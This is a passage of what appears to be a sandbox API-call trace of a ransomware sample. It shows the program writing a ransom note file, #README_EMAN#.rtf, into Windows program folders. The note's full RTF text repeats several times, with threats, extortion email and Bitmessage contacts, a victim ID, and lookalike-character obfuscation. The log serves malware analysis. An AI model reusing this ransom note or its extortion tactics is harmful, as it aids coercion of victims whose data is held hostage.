lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0262.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0262.639] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0262.640] CloseHandle (hObject=0x2c8) returned 1 [0262.640] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\#readme_eman#.rtf")) returned 0xffffffff [0262.640] GetLastError () returned 0x2 [0262.640] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0262.641] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0262.641] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 